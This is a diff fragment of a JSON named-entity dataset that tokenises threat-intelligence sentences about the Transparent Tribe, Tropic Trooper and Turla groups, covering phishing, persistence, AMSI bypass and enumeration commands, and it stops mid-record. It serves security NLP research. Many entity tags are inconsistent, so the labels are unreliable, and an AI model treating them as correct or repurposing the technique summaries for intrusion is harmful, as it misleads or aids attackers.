"Tribe", + "has", + "crafted", + "malicious", + "files", + "to", + "exploit", + "CVE-2012-0158", + "and", + "CVE-2010-3333", + "for", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "can", + "hide", + "legitimate", + "directories", + "and", + "replace", + "them", + "with", + "malicious", + "copies", + "of", + "the", + "same", + "name." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Purp", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "used", + "weaponized", + "documents", + "in", + "e-mail", + "to", + "compromise", + "targeted", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "directed", + "users", + "to", + "open", + "URLs", + "hosting", + "malicious", + "content." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "can", + "mimic", + "legitimate", + "Windows", + "directories", + "by", + "using", + "the", + "same", + "icons", + "and", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "sent", + "spearphishing", + "e-mails", + "with", + "attachments", + "to", + "deliver", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "embedded", + "links", + "to", + "malicious", + "downloads", + "in", + "e-mails." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Transparent", + "Tribe", + "has", + "crafted", + "VBS-based", + "malicious", + "documents." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "SSL", + "to", + "connect", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "collected", + "information", + "automatically", + "using", + "the", + "adversary's", + "USBferry", + "attack." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "a", + "copy", + "function", + "to", + "automatically", + "exfiltrate", + "sensitive", + "data", + "from", + "air-gapped", + "systems", + "using", + "USB", + "storage." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "been", + "known", + "to", + "side-load", + "DLLs", + "using", + "a", + "valid", + "version", + "of", + "a", + "Windows", + "Address", + "Book", + "and", + "Windows", + "Defender", + "executable", + "with", + "one", + "of", + "their", + "tools." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper's", + "backdoor", + "has", + "communicated", + "to", + "the", + "C2", + "over", + "the", + "DNS", + "protocol." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "used", + "shellcode", + "with", + "an", + "XOR", + "algorithm", + "to", + "decrypt", + "a", + "payload.", + "Tropic", + "Trooper", + "also", + "decrypted", + "image", + "files", + "which", + "contained", + "a", + "payload." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "injected", + "a", + "DLL", + "backdoor", + "into", + "dllhost.exe", + "and", + "svchost.exe." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "encrypted", + "traffic", + "with", + "the", + "C2", + "to", + "prevent", + "network", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "encrypted", + "configuration", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "exfiltrated", + "data", + "using", + "USB", + "storage", + "devices." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "executed", + "commands", + "through", + "Microsoft", + "security", + "vulnerabilities,", + "including", + "CVE-2017-11882,", + "CVE-2018-0802,", + "and", + "CVE-2012-0158." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "deleted", + "dropper", + "files", + "on", + "an", + "infected", + "system", + "using", + "command", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "monitored", + "files'", + "modified", + "time." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "created", + "a", + "hidden", + "directory", + "under", + "<code>C:\\ProgramData\\Apple\\Updates\\</code>", + "and", + "<code>C:\\Users\\Public\\Documents\\Flash\\</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "a", + "delivered", + "trojan", + "to", + "download", + "additional", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "known", + "administrator", + "account", + "credentials", + "to", + "execute", + "the", + "backdoor", + "directly." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "lured", + "victims", + "into", + "executing", + "malware", + "via", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "hidden", + "payloads", + "in", + "Flash", + "directories", + "and", + "fake", + "installer", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "multiple", + "Windows", + "APIs", + "including", + "HttpInitialize,", + "HttpCreateHttpHandle,", + "and", + "HttpAddUrl." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "used", + "<code>pr</code>", + "and", + "an", + "openly", + "available", + "tool", + "to", + "scan", + "for", + "open", + "ports", + "on", + "target", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "used", + "<code>netview</code>", + "to", + "scan", + "target", + "systems", + "for", + "shared", + "resources." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "is", + "capable", + "of", + "enumerating", + "the", + "running", + "processes", + "on", + "the", + "system", + "using", + "<code>pslist</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "created", + "shortcuts", + "in", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "attempted", + "to", + "transfer", + "USBferry", + "from", + "an", + "infected", + "USB", + "device", + "by", + "copying", + "an", + "Autorun", + "function", + "to", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "can", + "search", + "for", + "anti-virus", + "software", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper's", + "backdoor", + "could", + "list", + "the", + "infected", + "system's", + "installed", + "software." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "sent", + "spearphishing", + "emails", + "that", + "contained", + "malicious", + "Microsoft", + "Office", + "and", + "fake", + "installer", + "file", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "base64", + "encoding", + "to", + "hide", + "command", + "strings", + "delivered", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "JPG", + "files", + "with", + "encrypted", + "payloads", + "to", + "mask", + "their", + "backdoor", + "routines", + "and", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "detected", + "a", + "target", + "system’s", + "OS", + "version", + "and", + "system", + "volume", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "scripts", + "to", + "collect", + "the", + "host's", + "network", + "topology." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "tested", + "if", + "the", + "localhost", + "network", + "is", + "available", + "and", + "other", + "connection", + "capability", + "on", + "an", + "infected", + "system", + "using", + "command", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "used", + "<code>letmein</code>", + "to", + "scan", + "for", + "saved", + "usernames", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "delivered", + "malicious", + "documents", + "with", + "the", + "XLSX", + "extension,", + "typically", + "used", + "by", + "OpenXML", + "documents,", + "but", + "the", + "file", + "itself", + "was", + "actually", + "an", + "OLE", + "(XLS)", + "document." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "HTTP", + "in", + "communication", + "with", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "started", + "a", + "web", + "service", + "in", + "the", + "target", + "host", + "and", + "wait", + "for", + "the", + "adversary", + "to", + "connect,", + "acting", + "as", + "a", + "web", + "shell." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "used", + "Windows", + "command", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "installed", + "a", + "service", + "pointing", + "to", + "a", + "malicious", + "DLL", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tropic", + "Trooper", + "has", + "created", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon\\Shell</code>", + "and", + "sets", + "the", + "value", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "encrypted", + "files", + "stolen", + "from", + "connected", + "USB", + "drives", + "into", + "a", + "RAR", + "file", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Turla", + "JavaScript", + "backdoor", + "has", + "used", + "Google", + "Apps", + "Script", + "as", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "may", + "attempt", + "to", + "connect", + "to", + "systems", + "within", + "a", + "victim's", + "network", + "using", + "<code>net", + "use</code>", + "commands", + "and", + "a", + "predefined", + "list", + "or", + "collection", + "of", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "modified", + "variables", + "in", + "kernel", + "memory", + "to", + "turn", + "off", + "Driver", + "Signature", + "Enforcement", + "after", + "exploiting", + "vulnerabilities", + "that", + "obtained", + "kernel", + "mode", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "encryption", + "(including", + "salted", + "3DES", + "via", + "PowerSploit's", + "<code>Out-EncryptedScript.ps1</code>),", + "random", + "variable", + "names,", + "and", + "base64", + "encoding", + "to", + "obfuscate", + "PowerShell", + "commands", + "and", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "can", + "impersonate", + "or", + "steal", + "process", + "tokens", + "before", + "executing", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "a", + "custom", + ".NET", + "tool", + "to", + "collect", + "documents", + "from", + "an", + "organization's", + "internal", + "central", + "database." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "can", + "upload", + "files", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "B-SecTeam", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "can", + "collect", + "files", + "from", + "USB", + "thumb", + "drives." + ], + "ner_tags": [ + "B-Idus", + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "a", + "custom", + "decryption", + "routine,", + "which", + "pulls", + "key", + "and", + "salt", + "values", + "from", + "other", + "artifacts", + "such", + "as", + "a", + "WMI", + "filter", + "or", + "PowerShell", + "Profile,", + "to", + "decode", + "encrypted", + "PowerShell", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "a", + "AMSI", + "bypass,", + "which", + "patches", + "the", + "in-memory", + "amsi.dll,", + "in", + "PowerShell", + "scripts", + "to", + "bypass", + "Windows", + "antimalware", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>net", + "user", + "/domain</code>", + "to", + "enumerate", + "domain", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>net", + "group", + "\"Domain", + "Admins\"", + "/domain</code>", + "to", + "identify", + "domain", + "administrators." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "infected", + "victims", + "using", + "watering", + "holes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "Metasploit", + "to", + "perform", + "reflective", + "DLL", + "injection", + "in", + "order", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "WebDAV", + "to", + "upload", + "stolen", + "USB", + "files", + "to", + "a", + "cloud", + "drive.", + "Turla", + "has", + "also", + "exfiltrated", + "stolen", + "files", + "to", + "OneDrive", + "and", + "4shared." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Turla", + "has", + "exploited", + "vulnerabilities", + "in", + "the", + "VBoxDrv.sys", + "driver", + "to", + "obtain", + "kernel", + "mode", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "files", + "in", + "specific", + "locations", + "on", + "the", + "hard", + "disk", + "%TEMP%", + "directory,", + "the", + "current", + "user's", + "desktop,", + "the", + "Program", + "Files", + "directory,", + "and", + "Recent.", + "Turla", + "RPC", + "backdoors", + "have", + "also", + "searched", + "for", + "files", + "matching", + "the", + "<code>lPH*.dll</code>", + "pattern." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "the", + "Registry", + "to", + "store", + "encrypted", + "and", + "encoded", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "surveys", + "a", + "system", + "upon", + "check-in", + "to", + "discover", + "Group", + "Policy", + "details", + "using", + "the", + "<code>gpresult</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Based", + "on", + "comparison", + "of", + "Gazer", + "versions,", + "Turla", + "made", + "an", + "effort", + "to", + "obfuscate", + "strings", + "in", + "the", + "malware", + "that", + "could", + "be", + "used", + "as", + "IoCs,", + "including", + "the", + "mutex", + "name", + "and", + "named", + "pipe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "shellcode", + "to", + "download", + "Meterpreter", + "after", + "compromising", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "compromised", + "internal", + "network", + "systems", + "to", + "act", + "as", + "a", + "proxy", + "to", + "forward", + "traffic", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>tracert</code>", + "to", + "check", + "internet", + "connectivity." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "various", + "JavaScript-based", + "backdoors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Turla", + "RPC", + "backdoors", + "can", + "be", + "used", + "to", + "transfer", + "files", + "to/from", + "victim", + "machines", + "on", + "the", + "local", + "network." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>net", + "user</code>", + "to", + "enumerate", + "local", + "accounts", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "abused", + "local", + "accounts", + "that", + "have", + "the", + "same", + "password", + "across", + "the", + "victim’s", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>net", + "localgroup</code>", + "and", + "<code>net", + "localgroup", + "Administrators</code>", + "to", + "enumerate", + "group", + "information,", + "including", + "members", + "of", + "the", + "local", + "administrators", + "group." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "multiple", + "backdoors", + "which", + "communicate", + "with", + "a", + "C2", + "server", + "via", + "email", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "spearphishing", + "via", + "a", + "link", + "to", + "get", + "users", + "to", + "download", + "and", + "run", + "their", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "developed", + "its", + "own", + "unique", + "malware", + "for", + "use", + "in", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "malware", + "obtained", + "after", + "compromising", + "other", + "threat", + "actors,", + "such", + "as", + "OilRig." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Turla", + "has", + "modify", + "Registry", + "values", + "to", + "store", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "and", + "its", + "RPC", + "backdoors", + "have", + "used", + "APIs", + "calls", + "for", + "various", + "tasks", + "related", + "to", + "subverting", + "AMSI", + "and", + "accessing", + "then", + "executing", + "commands", + "through", + "RPC", + "and/or", + "named", + "pipes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>net", + "accounts</code>", + "and", + "<code>net", + "accounts", + "/domain</code>", + "to", + "acquire", + "password", + "policy", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "<code>fsutil", + "fsinfo", + "drives</code>", + "to", + "list", + "connected", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Turla", + "has", + "used", + "PowerShell", + "to", + "execute", + "commands/scripts,", + "in", + "some", + "cases", + "via", + "a", + "custom", + "executable", + "or", + "code", + "from", + "Empire's", + "PSInject.", + "Turla", + "has", + "also", + "used", + "PowerShell", + "scripts", + "to", + "load", + "and", + "execute", + "malware", + "in", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", 